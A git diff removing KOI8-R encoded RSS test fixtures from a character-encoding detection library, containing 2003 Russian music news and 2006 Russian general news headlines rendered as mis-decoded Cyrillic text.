@@ -1,112 +0,0 @@ - - - - - - םױֱֻ ־ֱ PeePs.ru: ֳֵֵׂ־ֹֹ - וײִֵ־ֵ׳־ֵֿ ֽױֱֻּ״־ֵֿ ֱִֹ־ֵֹ - http://music.peeps.ru - - - םױֱֻ ־ֱ PeePs.ru - http://www.peeps.ru/banners/our/zn.gif - http://music.peeps.ru - 88 - 31 - - - - "SMASH!" - Freeway - http://music.peeps.ru/news/s/2003/03/19/1432.html - זֱֻװ, װֿ ֲ׳ֵֹ «מֵ׀ֿ׃ִֵ», ֱ ־־ֵ «Smash!» ׳׳ֱֹֹּּ׃״ ׳ ֻֿװֵּ ֿױ-ֲֹ־ֵ׃ֱ ֱֱֲִַּֿׁׂ ׀ֲִֵֵֿ ׳ ׀ֵׂ׃װֹײ־ֽֿ ֽױֱֻּ״־ֽֿ ֻֿ־ֻױׂ׃ֵ, ־ֹ ֹֻֽֿ ֱֲֽֿֿׂ ־ֵ ׀ֿ׳ֵּֿׁװ ׃װֱ׳ֹװ״ ָֹ ׳ ִֹֿ־ ױֿׂ׳ֵ־״ ׃ «הׂױַֹֹֽ ׀ֱׂ׳ֱֹֹּֽ», «כֿׂ־ֹֽׁ» ֹֹּ «זֱֲֹֻֿׂ». קֿ-׀ֵׂ׳ָ, «Smash!» ׀ְֿװ ־ֱ ֱ־ַֹּ׃ֻֽֿ, ׳ֿ-׳װָֿׂ, ׀ְֿװ ׀ֿׂ׃װֿ ִֿֿׂ׳ֿ! - - - - גןלרבס ףפיעכב 3 Artist : V / A - http://music.peeps.ru/news/s/2003/03/19/1431.html - ק׃ֵֽ װֵֵֹּׂװֵּֽׁ, ֱ װֱֻײֵ װֵֵֹּׂװֵּ״־ֱֳֹֽ! גֱֱִַּֿׁׂ ׃׳ֵֽֿױ ׃ֲֿׂ־ֹֻױ ֹ ׀ֱֵַֽֽֿׂׂ «גּֿ״ֱׁ ׃װֱֹֻׂ» ב.םֱֱָּֿ׳ ֱִֹׂװ ׳ֵ׃ֵ־־ֵֵ ־ֱ׃װֵֿׂ־ֵֹ! מֱ ֱֽ׃׃ֿ׳ױְ «ףװֹֻׂױ» ׀ֱֵַֹּׂ־ ִָֹֻֽֿֿֿׁ בּ׃ױ ׃ ׀ֵ׃־ֵ «קֱֵׂ», ף׳ֵװֱ ׃ ָֹװֽֿ «ק׃ֵ-װֱֹֻ ֽֿײ־ֿ», םֱֱ עֱ׃׀ױװֹ־ֱ ׃ «ףױֱֽ׃ִֵֹֽ ִֿײִֵֽ», פֱ־ׁ גױֱּ־ֿ׳ֱ ׃ װֵֻֽֿׂ - - - - "BENEFIT" - http://music.peeps.ru/news/s/2003/03/19/1430.html - ףּֿ׳ֿ benefit ׃ ֱ־ַֹּ׃ַֻֿֿ ֿ־ֱֱֵװ «׀ּֿ״ֱ», «׳ֱִַֿ». ץײ ־ֵ ־ְֱ, ־ֱ ׃ֻּֿ״ֻֿ ׳ִַֿ־ֿ ֲּֿ ׀ְִֿׂ׃ֱֵֽׂ ִױװֱ ֿ׃װֱ׳ּׁװ״ ׀ֱּ׃װֹ־ֻױ ֲֵ ־ֱ׳ֱ־ֹׁ, ־ֿ װֿ, װֿ ׃ֹ־ַּ «Sex Sells» ִַּֿֿ ־ֵ ׃׀ֱּּֿ ׃ װֿ׀-׀ֳֹֹֿ, ׁ׳־ֿ ־ֵ ֿ׃װֱ׳ֹּֿ «Benefit» ׳ ׀ֵַֹֿׂׂ. - - - - "ןכובמ ולרתי" - ףױ׀ֵׂ׃ֵֹֽװׂiׁ - http://music.peeps.ru/news/s/2003/03/19/1429.html - נֵׂ׳ֵֿ, װֿ ֲֿׂ׃ֱֵװ׃ׁ ׳ ֱֱַּ - ֲּֿֿײֱֻ ִֹ׃ֱֻ: ֱֻּ׳ֹֹ ֶֿׂװֵ׀ֱֹ־ֿ ־ֱ ֵׂ־ֽֿ ֶֿ־ֵ - ׳ִֹֹֽֿ, װֿ ׳ֱׂײֵ־ֵֹ װֿ ׃ֱֽֿ «׃ֵֹֽֽװֹֹׂ» ׃ ׀ֹׂ׃װֱ׳ֻֿ «׃ױ׀ֵׂ», ֱֲֿֿׂ׳ֱ־־ֿ ׳ ־ֱ׳ֱ־ֹֹ ֱּ״ֱֲֽֿ. מֿ, װֿ װֱֵֻֿ ׃ױ׀ֵׂ׃ֵֹֽֽװֹׁׂ? - - - - TLC 3D - http://music.peeps.ru/news/s/2003/03/19/1425.html - מֿ׳ ֱּ״ֲֽֿ ֱֱֵֹֻֽׂ־ֻֿ TLC 3D - ֵװ׳ֵׂװ ׀ֿ ׃ֵװױ ׳ ִֹ׃ֱֶַֹֹֻֿׂ װֹֿׂ. ק ֵׂױּ״װֱװֵ װֱֵַֹׂ׃ֻֿ ֲֵַֹֹּ ׳ ֱ׳װֱֻֿװֱ׃װֵֶֿׂ ִֿ־ֿ ֹ ױֱ׃װ־ֳֹ ַׂױ׀׀ לֹ Left Eye לֿ׀ֵ׃ װֹֿׂ ׀ֵׂ׳ֱׂװֹּֿ׃״ ׳ ִױװ. Chilli ֹ T-Boz ֵֹֹּׂ ׀ִּֿֿׂײֱװ״ ׃ֿ׳ֵֽ׃װ־ױְ ֱֲֿׂװױ ֲֵ װֵׂװ״ֵ ױֱ׃װ־ֳֹ, ־ֿ, ֵ׃װֵ׃װ׳ֵ־־ֿ, װֿ 3D ׀ֿ׃׳ֵׁ־ ֵֵ ׀ֱֽׁװֹ. - - - - DJ Tomekk - Beat Of Life, vol.1 - http://music.peeps.ru/news/s/2003/03/19/1424.html - הִֹײֵ פֵֻֻֽֿ - ֱֽ׃װֵׂ ֵ׳ֿׂ׀ֵ׃ַֻֿֿ ױֿׂ׳־ׁ, ׳׃װױ׀ֱ׳ֹ ׳ֵֽ׃װֵ ׃ װֱֹֹֻֽ װֹװֱ־ֱֹֽ ׂ׀ֱ, ֱֻֻ RunDMC, Wu-tang Clan, LL Cool J ֹ KRS-One, ׃ֱִֵּ׳ֹ ֵֹֻֽׂ׃ ־ֱ ׀ֵ׃־ֹ Brandy, Fugees ֹ ֱִײֵ Jay-Z. קֿװ ֹ ־ֿ׳ ֵַֿ ֱּ״ֲֽֿ - Beat Of Life vol.1 - - - - Dieter Bohlen - Greatest Hits - http://music.peeps.ru/news/s/2003/03/19/1423.html - ק׀ױֵ־־ ֻֽֿ׀ֱ־ֵֹ BMG ׃ֲֿׂ־ֹֻ ּױָֹ ׀ֵ׃ֵ־ ׀ֵ׳ֱֳ, ֻֽֿ׀ֹֿװֱֿׂ ֹ ׀ְִֿׂ׃ֱֵׂ הֹװֱֵׂ גֵּֿ־ֱ - ֱִֿׂ׃װ״ ִּׁ ֱֽֿׂ־װֹ־ָ ׀ֻּֿֿ־־ֳֹ ׃ֱִַֻּּֿֿֿ׃ַֿֿ ־ֱֳֵֽ. הֱ ֹ ־ֵ װּֿ״ֻֿ ִּׁ ־ָֹ: ׃ֲֿׂ־ֹֻ ־ֵ׀ֹׂװֱׁװֵּ״־ֿ ִֵֹּֽֿ־ֿ ׀ֿ׀-ֽױֹֻ ֿװֹּ־ֿ ׀ִִֵֿֿװ ִּׁ ׳ֵֵֹׂ־ֻֿ ׃ װֱ־ֱֳֹֽ. - - - - כׂױװֿ װ ׀ֿ׀ֱּ. זבגעיכב תקותה - http://music.peeps.ru/news/s/2003/03/12/1366.html - זֱֲֹׂ־ֵֿ ׀ֹֿׂ׳ִֿ׃װ׳ֿ ־ֵ ׃װֹֿװ ־ֱ ֵֽ׃װֵ, ֱ ׳ִָֹֿװ ־ֱ ־ֿ׳ֵ ֵּׂ״׃ - «׳ֱִֵ־ױװֵ» «ֻׂױװֿ ׀ֿ׀ֱֹּ» װֵ׀ֵׂ״ ־ֵ װּֿ״ֻֿ ־ֱ װ׳-ֱֻׂ־, ־ֿ ֹ ־ֱ ֻֽֿ׀ֱֻװ-ִֹ׃ֻ. עֵױּ״װֱװ, ַֿ׳ֹֿׁׂ ׃ֱֽ ֱ ׃ֲֵׁ - «ֱֱֲֶֹֻׂ» ֹֽ. םֱװ׳ֵֹ־ֻֿ ֱֲֿׂװֱֵװ ׃װֱֲֹּ״־ֿ ֹ ׀ִֿׂױֻװֹ׳־ֿ. - - - - "ת׳ֵֹׂ" - "ִַּֿֿ" - http://music.peeps.ru/news/s/2003/02/26/1293.html - 13 װֵֻֿׂ׳ ְֲִֵװ־ַֿֿ ֱּ״ֱֲֽֿ ַׂױ׀׀ «ת׳ֵֹׂ» ׳ ֳֵּֽֿ ֿ׃װֱ׳ְּׁװ ׀ֹׁׂװ־ֵֿ ׳׀ֱֵװֵּ־ֵֹ, ־ֿ ײֵ ׳ֵֽׁׂ ־ֵ ׀ֱִֵֹֻֿװ ֿױֵ־ֵֹ ־ֵֻֿװַֿֿֿׂ ִֿ־ֱֲֹֿֿׁׂ. חִֵ-װֿ ־ֱ ׃ִֵֵֹׂ־ֵ ׀ֿׂ׃ּױֹ׳ֱ־ֹׁ ִֹ׃ֱֻ ׀ֿׁ׳ֵּׁװ׃ׁ ֿױֵ־ֵֹ, װֿ ֱֵַֹׂװ ִֿ־ֱ ֹ װֱ ײֵ ׀ֵ׃־ׁ - - - - Moral Codex - The best - http://music.peeps.ru/news/s/2003/02/26/1292.html - ףֲֿׂ־ֹֻ The Best, ׳׀ױֵ־־ ֶֹֽֿׂ CD Land ׳ 2002 ִַֿױ, ׀ִֵׂ׃װֱ׳ֵּׁװ ׃ֲֿֿ ׀ֲִֻֿֿׂױ ּױָֹ ָֹװֿ׳ ַׂױ׀׀ «םֱּֿׂ״־ כִֵֻֿ׃». הױֱֵֽװ׃ׁ, ֽװׂ «םֱּֿׂ״־ כִֵֻֿ׃» ׳ ֿ׃ֲֽֿֿ ׀ִֵׂ׃װֱ׳ֵּ־ֹֹ ־ֵ ־ױײְֱִװ׃ׁ. - - - - 'פֵ־״ - 64' - 'ןֲׂ׳ֹֻ ֱֶׂ' - http://music.peeps.ru/news/s/2003/02/26/1291.html - הְֲֵװ־ ֱּ״ֲֽֿ ַׂױ׀׀ ֹ מֿ׳ַֿֿ ן׃ֱֻּֿ «פֵ־״ - 64» ׀ִֿ ־ֱ׳ֱ־ֵֹֽ «ןֲׂ׳ֹֻ ֱֶׂ» ֿװֵֵֽ־ ׳׃ֲֵֵֿ ֲֵּֿ־״ְ ִָּֽֿֿ ֿׂ׃׃ֹ׃ָֹֻ ֱֻֽֿ־ִ: ׳ִֵֿׂ ֲ ֹ ַֹװֱׂ־ֵ ׃ּֿֿ ׀ֹׂ׃ױװ׃װ׳ױְװ, ֹ ׳ֱֻּֿ ָֿֿׂ, ֹ ְֱַֹׂװ ־ֵ׀ָּֿֿ, ֹ ׀ֵ׃־ֹ ׃ֹֿ־ְׁװ ֱֻׂ׃ֹ׳ֵ. - - - - Angelight - הֵװֹ ןֱֵֻ־ֱ - http://music.peeps.ru/news/s/2003/02/23/1257.html - הֽֿֿֿׂ£־־ֵ ־ֲִֵֿֿׂײֱֵּװֵֹּ ֽױֹֻ ־״ְ-ִײ ֱִ׳־ֿ ױײֵ ֵֻֿׂ׃װֹֹּ ֵ£ ־ױִ־ֿ, ִֿ־ֱֲֿֿׂ־ֿ ֹ ֲֵ׃׃ֽ׃ֵּ־־ֿ. י װֿ ־ֵ׳ֱֹׁׂ ־ֱ װֿ, װֿ ׃ֱֽ ׀ֿ׃ִֵּֿ׳ֱװֵּ״־ ֵ£ ֿׂ׃׃ֹ׃ֹֻ ֱִֵ׀װ Angelight ׀ֵׂ׃ִֵּױֵװ ֱֻײִֽ ׃׳ֹֽֿ ֱּ״ֲֽֽֿֿ ׳׀ּֿ־ֵ ֻֿ־ֵֻׂװ־ֵ ֳֵֹּ. - - - - NOFX "Pump Up The Valuum" - http://music.peeps.ru/news/s/2003/02/11/1199.html - נָֿֿײֵ, ֲִֹֿ׳ֹ׃״ ׳ִֵ־ַֿֿ ׃װֱװױ׃ֱ, ֹ ׃װֱ׳ ׃׳ֵַֿֿ ֱִֿׂ ֱֻֿ־ֱִֿװֵֹּֽׁ ײֱ־ֱׂ, NOFX ֵֹֹּׂ ׀ּֿ־ֿ׃װ״ְ ׀ַֿׂױֹװ״׃ׁ ׳ ִױֱֻֿׂ׳ֱּׁ־ֵֹ ֹ ׃ֱֽֿ׀ֱִֹֿֿׂׂ׳ֱ־ֵֹ. לֱֹֹֻׂ װֹ׀ֱ: «She's got a silicone cock sticking in her ass  one in her cunt» ֹֹּ «there's nothing finer than having a vagina» ׳ִֹּׁׂ ׀ִֵֹׂװ׃ׁ ׀ֿ ׳ֻױ׃ױ ױװֿ־ֵ־־ֽ ֹ־װֵֵֻּּװױֱֱּֽ, ־ֿ ֵַֿ ׳ ָֿװֵֹּ, װֿ ײֵ ׳׃ֵ-װֱֹֻ ׀ֱ־ֻ-ֻֿׂ. - - - - No Use For A Name "More Betterness" CD - http://music.peeps.ru/news/s/2003/02/11/1198.html - נֵַֿׂׂ׃׃ֹׂױׁ ׃ ֱֻײִֽ ־ֿ׳ֽ ֱּ״ֲֽֽֿֿ NUFN ׀ָֿֿײֵ ִֿ׃װַֹֹּ ׃ֿ׳ֵֵׂ־׃װ׳ֱ. ק ֿװֵֹֹּ ֿװ ֲּֿ״ֹ־׃װ׳ֱ ִֿ־ֱֲֿֿׂ־ֿ ׳ֵ׃ֵָּ ׀ֿ׀-׀ֱ־ֻ ַׂױ׀׀, NUFN ֱִֻּױװ ׳ ֿ׃־ֿ׳ ׃׳ֵֿ ֽױֹֻ ַׂױ׃װ־ֵ ִֵֹֹּֽֿ, ֻֿװֵֿׂ ׳ ׃ֵֿװֱ־ֹֹ ׀ֿׂ־ֹֻ־ֿ׳ֵ־־ֽ ׳ֱֻּֽֿֿ ֹ ַֹֻֽֽׁ ַֹװֱׂ־ֽ ׳ױֻֽֿ ׀ֹֿׂ׳ִֿׁװ ־ֱִֵֵַֹֹּֽֿ ׳׀ֱֵװֵּ־ֵֹ. - - - - Good Riddance "Operation phoenix" CD - http://music.peeps.ru/news/s/2003/02/11/1197.html - ץֱִ־ֿ ׃ֵֿװֱׁ װֹ׀ֹ־ֿ ֱֶֹֻּֿׂ־ֹ׃ֻױְ ׀ֱ־ֻֿ׳׃ֻױְ ִֵֹּֽֿ־ֿ׃װ״ ׃ ױ׀ׂױַֹֽ ֱִָֻֿֿׂׂ׳ֽ ׳ױֱ־ֵֹֽ (׳ ֽױֵֻ) ֹ ׃ֱֳֹּֿ״־ֿ-׀ֹּֿװֵֹ׃ֻױְ װֱֵֽװֹֻױ ׃ ֹּ־ֹֽ ׀ֵֵׂײֹ׳ֱ־ֹֹֽׁ (׳ װֵֻ׃װֱָ), GR ־ֵ ׳ ׀ֵׂ׳ ֱׂ ֱִֻֿ׳ְֱװ, װֿ ׁ׳ְּׁװ׃ׁ ִֿ־ֿ ֹ ׃ֱָֽ ׃ֹּ״־ָ ֹ ־ֱֵױִׁׂ־ָ ׀ֱ־ֻ-ַׂױ׀׀ 90-ָ. - - - - diff --git a/chardet/tests/KOI8-R/newsru.com.xml b/chardet/tests/KOI8-R/newsru.com.xml deleted file mode 100644 index 45641e5..0000000 --- a/chardet/tests/KOI8-R/newsru.com.xml +++ /dev/null @@ -1,351 +0,0 @@ - - - - -NEWSru.com -http://www.newsru.com -מֿ׳ֿ׃װֹ -ru -NEWSru.com, all rights reserved -info@newsru.com -Wed, 4 Jan 2006 05:45:00 +0300 - - http://newsru.com/img/ntv.gif - NEWSru.com - http://www.newsru.com - 115 - 28 - - - - ק פױֳֹֹׂ ׀׃ֵָֹֹ׃ֹֻ ־ִֵֿֿׂ׳ ֽױײֹ־ֱ ׳ֿׂ׳ֱּ ָּֿ׀ױֻױ ׳ ֱִ־ֹֹ םֹ־ְ׃װֱ - http://www.newsru.com/world/03jan2006/ankara.html - י־ֳִֵֹ־װ ׀ֵֹּֿֿׂ ־ֱ ִֿ־ֽֿ ֹ װֱײֵ ֱִ־ֹׁ םֹ־ְ׃װֱ ׳ ב־ֱֵֻׂ, ִֵַ ֱׂ׃׀ּֿֿײֵ־ֿ ױ׀ֱׂ׳ֵּ־ֵֹ ֹ׃׀ּֿ־ֵ־ֹׁ ־ֱֱֱֻ־ֹ. ק ׀ֳֹֹֹּֿ ױ׳ְֵׁׂװ, װֿ ׀ֹֿׂ׃ִֵֵֵ ־ֵ ׁ׳ֵּׁװ׃ׁ װֱֵֻׂװֽֿ. קֹ־ֿ׳־ֹֻ ׀ֹֿׂ׃ֵ׃װ׳ֹׁ ֱִֵׂײֱ־. - ק ֵֹֽׂ - Tue, 3 Jan 2006 19:57:00 +0300 - - - - - ק חיגהה ְֱֲֵֿװ ־ֵ װֱֶֿׂ׳ֱװ״ ׳ ׁ־׳ֱֵׂ ׳ִֹֿװֵֵּ ֱ ־ֱׂױֵ־ֹׁ ־ֿ׳ָ ׀ֱׂ׳ֹּ ִֿֿׂײ־ַֿֿ ִ׳ֹײֵ־ֹׁ - http://www.newsru.com/russia/03jan2006/gibddnow.html - ק ׀ֵׂ׳ֵ ־ִֵֵֹּ ־ֿ׳ַֿֿ ֱִַֿ ׃ֿװׂױִ־ֹֹֻ חיגהה ֲױִױװ ּּֿׁ״־ֿ ֿװ־ֿ׃ֹװ״׃ׁ ֻ ׳ִֹֿװֵּֽׁ, ־ֵ ױ׃׀ֵ׳ֹֽ ׳ױֹװ״ ־ֿ׳ֵ ׀ֱׂ׳ֱֹּ ִֿֿׂײ־ַֿֿ ִ׳ֹײֵ־ֹׁ, ׳׃װױ׀ֹ׳ֵֹ ׳ ׃ֹּױ ׃ 1 ׁ־׳ֱׁׂ 2006 ֱִַֿ. י־׃׀ֵֻװֱֽֿׂ חיגהה ׀ִֵׂ׀ֹ׃ֱ־ֿ ֲֿׁ׃־ֹװ״ ׳ִֹֿװְֵּ ׃ױװ״ ־ֱׂױֵ־ֹׁ ֹ ׃ֱִֵּװ״ ֵֽױ ׀ִֵׂױ׀ֵׂײִֵ־ֵֹ. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 19:22:00 +0300 - - - - - ק יֱֵֻׂ ֱֲֹּׂ׃ׁ ֱֱֵֹֻֽׂ־׃ֹֻ ׳ֵֿ־־ ׳ֵׂװֵּֿװ: ִ׳ֵֿ ׀ֲַָֹֹֿ - http://www.newsru.com/world/03jan2006/heli.html - נֿ ֱִ־־ֽ ֱֹֻׂ׃ֻֿ ׀ֳֹֹֹּֿ, ׳ֵׂװֵּֿװ ױ׀ֱּ ֹֹּ ֲּ ׃ֲֹװ ׳ֿ ׳װֿׂ־ֹֻ ׀ֵֹֽׂׂ־ֿ ׳ 60 ֵֹֻּֽֿװֱָׂ ׃ֵ׳ֵֿׂ-׳ֿ׃װֿ־ֵֵ גֱֱֱִִַ. ק ֵׂױּ״װֱװֵ ֹ־ֳִֵֹ־װֱ ׀ֲַֹֹּֿ ִ׳ֵֿ ׳ֵֿ־־ֿ׃ּױײֱָֹ ֱֹֹֽׂ ףב. - ק ֵֹֽׂ - Tue, 3 Jan 2006 18:58:00 +0300 - - - - - עֿ׃׃ֹ׃ֵֹֻ װֵ־־ֹ׃ֹ׃װ ־ֵױֱִ־ֿ ׃װֱׂװֿ׳ֱֹּ ־ֱ כױֲֵֻ טֿ׀ֱֽ־ֱ - http://www.newsru.com/sport/03jan2006/hopman.html - ףֲֿׂ־ֱׁ עֿ׃׃ֹֹ ׀ֿ װֵ־־ֹ׃ױ ׀ֱֱַֹּֿׂׂ ׃׳ֿ ׃װֱׂװֿ׳ ֱֽװ ־ֱ װֱֳִֹֹֿׂ־־ֽֿ ־ֿ׳ִַֿֿ־ֵֽ װױׂ־ֵֹׂ כױֲֻֿ טֿ׀ֱֽ־ֱ ׃ ׀ֹֿׂ׳ֽ ֶֿ־ִֽֿ ֹֹּּֽֿ־ ֱִּּֿֿׂ׳ ףב, ֻֿװֿׂ ׀ִָֹֿֿׂװ ׳ ֱ׳׃װֱֹּׂ׃ֻֽֿ ִֵַֿֿׂ נֵׂװ. - ף׀ֿׂװ - Tue, 3 Jan 2006 18:32:00 +0300 - - - - - - - גֱַֿװֵ ֿׂ׃׃ֹׁ־ֹֻ ְֱִֵּװ ֲֿֿֿׂװ ֹ ֿ׀ְִֵֵּׁׂװ ׃װֹּ״ ֵ׳ֿׂ׀ֵ׃ָֹֻ ִֽֿֿ׳ ִֽֿ - http://www.newsru.com/russia/03jan2006/women.html - כֵׂ׃װ״ׁ־׃ֵֹֻ ֲּױ, ֽ־ַֿֿ ֵָֽֿ׳ ֹ ֲֿׂ׃ֵֹֻ ױֱֵֻׂ־ֹׁ - ׳ ־־ֵ־ֵֽ ׃ֵֿ־ֵ ֱֲַֿװֵ ֿׂ׃׃ֹׁ־ֹֻ ְֱִֵּװ ֲֿֿֿׂװ ֹ ֿ׀ְִֵֵּׁׂװ ׃װֹּ״ ֱ׀ֱִ־ָ ִֽֿֿ׳ ִֽֿ. עױ׃׃ֵֹֻ ׃ ױִֿ׳ּֿ״׃װ׳ֵֹֽ ׳׃װֱ׳ְּׁװ ׃׳ֵֿ ֱֲַֿװ׃װ׳ֿ ־ֱ׀ֱֻֿ, ׀ֵֹװ S&#252;ddeutsche Zeitung. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 17:53:00 +0300 - - - - - קֿ זֱׂ־ֳֹֹ ׃ 4 ׁ־׳ֱׁׂ ֿװֵֽ־ֵׁװ׃ׁ ֵׂ׳ֱ־ֵֿ ׀ּֿֿײֵ־ֵֹ, ׳׳ִֵֵ־־ֵֿ ׳ ׃׳ֹׁ ׃ ֱֽ׃׃ֿ׳ֹֽ ֲֵ׃׀ֱִֹֻֽֿׁׂ - http://www.newsru.com/world/03jan2006/nochs.html - ‏ֵׂ׳ֱ־ֵֿ ׀ּֿֿײֵ־ֵֹ ֲּֿ ׳׳ִֵֵ־ֿ ׳ֿ זֱׂ־ֳֹֹ 8 ־ֲֿׁׁׂ 2005 ֱִַֿ ױֱֻֽֿ ׀ִֵֵֹׂ־װֱ ׃װֱׂ־ ׳ ׃׳ֹׁ ׃ ֱֽ׃׃ֿ׳ֹֽ ֲֵ׃׀ֱִֹֻֽֿׁׂ ׳ ׀ֱִַָֹֿֿׂׂ נֱֹׂײֱ, ֱ 21 ־ֲֿׁׁׂ ׀ֱֱֵּֽׂ־װ ׀ִֹּּֿׂ ֵַֿ ִֵ׃װ׳ֵֹ ־ֱ װֹׂ ֵֽ׃ֱֳׁ. - ק ֵֹֽׂ - Tue, 3 Jan 2006 17:09:00 +0300 - - - - - ק יֱֵֻׂ קקף ףב ֲֿ׃װֵֹּּׁׂ ײֹּֿ ִֽֿ: ׀ֱֲַֹּֿ ׃ֵֽ״ׁ ֹ 14 ֵּֿ׳ֵֻ - http://www.newsru.com/world/03jan2006/iraq.html - נֿ ׃ּֿ׳ֱֽ ׀ִֵׂ׃װֱ׳ֹװֵּׁ ֱֹֻׂ׃ָֹֻ ׀ֱׂ׳ֱָֿֿׂ־ֹװֵּ״־ָ ֱַֿׂ־ֿ׳, ֲֿ׃װֵּׂױ ׃ ׳ִֿױֱָ ׀ִֿ׳ֵַׂ׃ׁ ײֹּֿ ִֽֿ ׳ ִֵַֿֿׂ גֱִײֹ ־ֱ ׃ֵ׳ֵֵׂ יֱֱֻׂ. ףֵֽ״ׁ ֹ 14 ֵּֿ׳ֵֻ, ־ֱִָֹֿ׳ֱׁ׃ׁ ׳ ִֵֽֿ, ׀ֱֲַֹּֿ. ק ֵׂױּ״װֱװֵ ֲֿ׃װֱֵּׂ ֵֵ װֹׂ ֵּֿ׳ֱֵֻ ׀ֿ׃װֱֱִֹּׂ, ־ֵ׃ֻּֿ״ֹֻֽ ֱִֽֽֿ ־ֱ־ֵ׃ֵ־ ױֲֵׂ. - ק ֵֹֽׂ - Tue, 3 Jan 2006 16:38:00 +0300 - - - - - ק םֹ־׃ֵֻ ׀ֿ ׀ִֵֿֿׂ־ְֹ ׳ ֱֶּ״ֹ׳ֽֿֿ־ֵװ־ֵֹ׃װ׳ֵ ֱִֵׂײֱ־ ׃־ ױֲֹװֿ ײױׂ־ֱֹּ׃װֹֻ ‏ֱֵֻׂ׃ֿ׳ֿ - http://www.newsru.com/crime/03jan2006/minsk.html - ק ֿװ־ֵֿ־ֹֹ ׃־ֱ ױֲֹװֿ ׳ ֻֿ־ֳֵ 2004 ֱִַֿ ײױׂ־ֱֹּ׃װֹֻ קֵֿׂ־ֹֹֻ ‏ֱֵֻׂ׃ֿ׳ֿ ב־װֿ־ֱ זֹֹּֽֿ־ֿ׳ֱ ֹ ֵֵ ־ֵ׃ֻּֿ״ָֹֻ ֵַֿ ־ֱָֻֽֿ ׳ֲֿױײִֵ־ֿ ױַּֿֿ׳־ֵֿ ִֵּֿ ׀ֿ ׃װ. 221 "יַֿװֿ׳ֵּ־ֵֹ, ֱָׂ־ֵ־ֵֹ ֲֹּֿ ׃ֲװ ֱֶּ״ֹ׳ָ ִֵ־ֵַ ֹֹּ ֳֵ־־ָ ֲױֱַֽ". - כֹֹֽׂ־ֱּ - Tue, 3 Jan 2006 15:39:00 +0300 - - - - - מֵֶװׁ־ֵ ֳֵ־ ׳ֿׂ׃ֹּ ֹ-ֱ ֱַֿ׳ַֿֿ ֻֿ־ֶֹֻּװֱ - http://www.newsru.com/finance/03jan2006/oil.html - דֵ־ ־ֱ ־ֵֶװ״ ־ֱ ֿ׃־ֿ׳־ָ ֹֽֿׂ׳ָ ֲֹׂײֱָ ׳ֿׂ׃ֹּ ֹ-ֱ ֱֲֵֿֿ־־ֿ׃װֹ װִֵֵֿׂׂ׳ ֿׂ׃׃ֹ׃ֻֿ-ױֱֹֻׂ־׃ֹֻֽ ֱַֿ׳ֽ ֻֿ־ֶֹֻּװֽֿ. מֱ מ״ְ-ךֻֿׂ׃ֻֿ NYMEX ֱֲֵּׂׂ״ ׀ִֿֿֿׂײֱּ ־ֱ 2,16 ֱֱִּּֿׂ - ִֿ 63,2 ֱֱִּּֿׂ ֱ ֱֲֵּׂׂ״. - ֻֿ־ֱֹֻֽֿ - Tue, 3 Jan 2006 15:28:00 +0300 - - - - - - - ק ‏ֲֵֹּׁ־׃ֵֻ ֵֽ׃װ־ ײֹװֵּ״ װֲֵׂױֵװ ֿװ ׃ױֱִ ֱֱֲֿׂׂװ״׃ׁ, ֿװ ַֻֿֿ ֿ־ ׀ֵֹּֿֿׂ: ֿװ בֱִֽ ֹ ו׳ ֹֹּ ֿװ ֲֵֿ״ׁ־ - http://www.newsru.com/russia/03jan2006/sered.html - צֹװֵּ״ ‏ֲֵֹּׁ־׃ֱֻ קֱ׃ֹֹּ ףִֵֵֿׂ־ֹ־, ׳׃װױ׀ְֱֹ ֿװ׳ֵװֹֻֽֿ ׳ ִֿ־ֽֿ ֹ ׃ױֲִֵ־ָ ׀ֳֵֿׂ׃׃ֿ׳, ֱִָֿװֱ׃װ׳ֿ׳ֱּ ֲֿ ֿװ׳ִֵֿ ׃ױִ״ֹ, ֽֿװֹ׳ֹׂױׁ װֿ װֵֽ, װֿ ֱֲֿ ֿ־ֹ ׀ֹֹּֿֿׂ ֿװ בֱֱִֽ ֹ ו׳, װֿ ֵ׃װ״ ׁ׳ְּׁװ׃ׁ ִֿׂ׃װ׳ֵ־־ֱֹֹֻֽ. ן־ ׃ֹװֱֵװ, װֿ ׃ױִ ִּֿײֵ־ ׀ֿׁׂ׃־ֹװ״ װֿװ ׳ֿ׀ֿׂ׃. - ק עֿ׃׃ֹֹ - Tue, 3 Jan 2006 15:15:00 +0300 - - - - - חׂױֹ־ ׃ ־ֿײֽֿ ֱװֱֻֿ׳ֱּ 20-ֵֽװֿׂ׳ױְ ־ֱִױ׳־ױְ ׃ֱֲֻֿױ ־ֱ ֱַּ׳־ֿ ׀ֱִֹּֿ תױִִַֹֹ (זןפן) - http://www.newsru.com/world/03jan2006/knifer.html - פֵֽױׂ כֱֲֹּֿׁ ־ֵ׃ֻּֿ״ֻֿ ֱׂ ׀ֿׂװֻ־ױּ ׃ֱֲֻֿױ ־ֿײֽֿ, ׀ֿ׃ֵּ ֵַֿ ֲּ ֱִֵׂײֱ־ ׀ֳֵֹֹּֿ. ן־ ־ֵ ׃ַֽֿ ֱִװ״ ׳־ׁװ־ַֿֿ ֲֿׁ׃־ֵ־ֹׁ ׃׳ֵֽֿױ ׀ֿ׃װױ׀ֻױ. וֽױ ַֹֿׂװ װֹׂ ֱִַֿ װְׂ״ֽ. - ק ֵֹֽׂ - Tue, 3 Jan 2006 14:52:00 +0300 - - - - - - - - - ק כֱֵֹׂ ֲֿׂױֹֹּ׃״ ־ֵ׃ֻּֿ״ֻֿ ײָֹּ ִֽֿֿ׳: ׀ֲַֹֹּֿ 3 ֵּֿ׳ֱֵֻ, 4 ׀ּֿױֹֹּ ֱׂ־ֵ־ֹׁ - http://www.newsru.com/world/03jan2006/cairo.html - י-ֱ ֲֿׂױֵ־ֹׁ ֵ׃װֹ- ֹ װֵָׂװֱײ־ַֿֿ ײָֹּ ִֽֿֿ׳ ׳ ׃װֳֵֹּֿ וַֹ׀װֱ ֱ׳ֱֱֹּֽ ֱֱֻּֿ׃ׁ ׀ֵֵֻׂׂװ ׀ִִֵֿ ִּׁ װֵָ־ֹֹֻ. נֹֹׂ־ֿ ֲֿׂױֵ־ֹׁ ִֽֿֿ׳ ׃װֱּֿ װֿ, װֿ ֵֽ׃װ־ֵ ײֹװֵֹּ ׃װֿׁׂװ ָֹ ֹ ׃ֱִֵּֽֿ״־ַֿֿ ֹֻׂ׀ֱֹ, ַֹֿװֿ׳ֵּ־־ַֿֿ ֹ ׀ֵׂ׃׃ֿ׳ֱ־־ַֿֿ ֽױ׃ֱֿׂ. - ק ֵֹֽׂ - Tue, 3 Jan 2006 14:37:00 